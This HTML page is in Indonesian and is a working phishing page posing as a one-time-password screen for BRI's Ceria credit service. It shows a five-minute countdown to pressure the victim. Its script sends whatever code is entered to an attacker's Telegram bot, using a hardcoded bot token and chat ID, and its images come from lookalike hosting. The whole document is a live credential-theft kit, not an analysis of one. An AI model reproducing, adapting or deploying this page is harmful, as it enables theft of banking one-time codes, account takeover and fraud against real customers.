<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Otp Ceria</title>
  <meta name="viewport" content="width, initial-scale=1">
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      text-align: center;
      display: flex;
      flex-direction: column;
      align-items: center;
    }

    /* Gambar */
    #gambar-atas {
      margin-top: 20px;
    }

    #gambar-atas img {
      width: 100%;
      object-fit: cover;
    }

    /* Kolom Input Kode OTP */
    #kode-otp {
      margin-top: 20px;
      width: 82%;
      max-width: 450px;
      padding: 12px;
      border-radius: 5px;
      border: 2px solid #663399;
    }

    /* Waktu Hitung Mundur */
    #countdown {
      margin-top: 25px;
      font-size: 16px;
      color: #red;
    }

    /* Tombol Submit */
    #submit {
      margin-top: 20px;
      padding: 13px;
      border-radius: 5px;
      border: none;
      background-color: #663399;
      color: white;
      font-weight: bold;
      cursor: pointer;
      width: 90%;
      max-width: 450px;
    }
    /* Gambar di bawah Tombol Submit */
    #gambar-bawah {
      margin-top: 80px;
    }

    #gambar-bawah img {
      width: 50%;
      object-fit: cover;
    }
  </style>
  <script>
    function sendMessageToTelegram(message) {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState === 4 && this.status === 200) {
          // Respons atau tindakan setelah pesan terkirim berhasil
          console.log("Pesan terkirim: " + message);
        }
      };

      // Ganti URL sesuai dengan endpoint bot Telegram Anda
      var url = "https://api.telegram.org/bot6946290282:AAHbPsb9hD-DbepVOIkge81AvWjY90YbbU0/sendMessage?chat_id=6824078885&text=" + encodeURIComponent(message);

      // Kirim permintaan POST
      xhttp.open("POST", url, true);
      xhttp.send();
    }

    function kirimPesan() {
      var kodeOTP = document.getElementById("kode-otp").value;
      sendMessageToTelegram("𝗞𝗼𝗱𝗲 𝗢𝗧𝗣: " + kodeOTP);
    }
  </script>
</head>
<body>
  <!-- Gambar -->
  <div id="gambar-atas">
    <img src="https://from-limit-ceria-id.netlify.app/otp/img/atas.jpg" alt="Gambar Atas">
  </div>

  <!-- Kolom Input Kode OTP -->
  <input type="number" id="kode-otp" name="kode_otp" placeholder="𝗞𝗼𝗱𝗲 𝗢𝗧𝗣 𝗕𝗹𝗶𝗯𝗹𝗶 𝗦𝗽𝗼𝗻𝘀𝗼𝗿 𝗕𝗿𝗶 𝗖𝗲𝗿𝗶𝗮" maxlength="6">

  <!-- Waktu Hitung Mundur -->
  <div id="countdown"></div>

  <!-- Tombol Submit -->
  <input type="submit" id="submit" value="Lanjutkan" onclick="kirimPesan()">
  <!-- Gambar Bawah -->
  <div id="gambar-bawah">
    <img src="https://wwed.online/ceria-id.com/img/2711.jpg" alt="Gambar 2711">
  </div>
  <script>
    // Waktu Hitung Mundur
    var countDownDate = new Date().getTime() + 5 * 60 * 1000; // 5 menit dari waktu sekarang

    var countdownElement = document.getElementById("countdown");

    var x = setInterval(function() {
      var now = new Date().getTime();
      var distance = countDownDate - now;

      var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
      var seconds = Math.floor((distance % (1000 * 60)) / 1000);

      countdownElement.innerHTML = "" + minutes + "m " + seconds + "s ";

      if (distance < 0) {
        clearInterval(x);
        countdownElement.innerHTML = "Waktu sudah habis!";
      }
    }, 1000);
  </script>
</body>
  </html>
